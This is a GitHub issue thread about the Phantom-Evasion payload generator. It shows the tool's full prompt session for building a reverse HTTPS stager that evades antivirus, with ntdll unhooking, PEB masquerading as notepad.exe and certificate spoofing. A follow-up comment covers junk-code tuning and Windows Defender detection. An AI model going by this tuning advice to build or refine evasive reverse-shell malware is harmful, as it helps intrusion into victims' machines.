Phantom-Evasion icon indicating copy to clipboard operation
Phantom-Evasion copied to clipboard
verified publisher icon oddcod3

Won't connect to msfconsole

Open Jupiops opened this issue 6 years ago • 1 comments

Don't know if I do something wrong but if I execute these File the process created consumes 50% of the cpu usage, but my msfconsole won't recognise any connections. on reverse_tcp just the same

[+] MODULE DESCRIPTION:

  Pure C reverse httpsstager 
  compatible with metasploit and cobaltstrike beacon
  [>] Local process stage execution type:
   > Thread                          
   > APC                             

  [>] Local Memory allocation type:

   > Virtual_RWX                     
   > Virtual_RW/RX                   
   > Virtual_RW/RWX                  
   > Heap_RWX                        

  [>] AUTOCOMPILE format: exe,dll 


  Press Enter to continue: 

[>] Insert Target architecture (default:x86):x64

[>] Insert LHOST: 192.168.*.***

[>] Insert LPORT: 4444

[>] Insert Exec-method (default:Thread):

[>] Insert Memory allocation type (default:Virtual_RWX):

[>] Insert Junkcode Intesity value (default:10):

[>] Insert Junkcode Frequency value  (default: 10):

[>] Insert Junkcode Reinjection Frequency (default: 0):3

[>] Insert Evasioncode Frequency value  (default: 10):20

[>] Dynamically load windows API? (Y/n):

[>] Add Ntdll api Unhooker? (Y/n):

[>] Masq peb process? (Y/n):

[>] Insert fake process path?(default:C:\windows\system32\notepad.exe):

[>] Insert fake process commandline?(default:empty):

[>] Strip executable? (Y/n):

[>] Use certificate spoofer and sign executable? (Y/n):

[>] Insert url target for certificate spoofer (default:www.windows.com:443):

[>] Insert certificate description (default:Notepad Benchmark Util):

[>] Insert output format (default:exe):

[>] Insert output filename:torpedo

[>] Generating code...                                                                                                                                     
                                                                                                                                                           

[>] Compiling...                                                                                                                                           
                                                                                                                                                           

[>] Strip binary...                                                                                                                                        
                                                                                                                                                           

[>] Sign Executable                                                                                                                                        
                                                                                                                                                           

[>] Signing torpedo.exe with osslsigncode...

[>] Succeeded


[<>] File saved in Phantom-Evasion folder

[>] Press Enter to continue

Jupiops avatar Jan 23 '20 21:01 Jupiops

Played around a little with the values and figured out that if you change the “Insert Junkcode” values too much, it will break the reverse_tcp functionality. But all EXEs who have a working reverse_tcp function are detected by Windows Defender on Win10 with all updates. Even if you have an EXE who will not be detected by Windows Defender, it will be detected on execution at the latest.

Jupiops avatar Jan 27 '20 12:01 Jupiops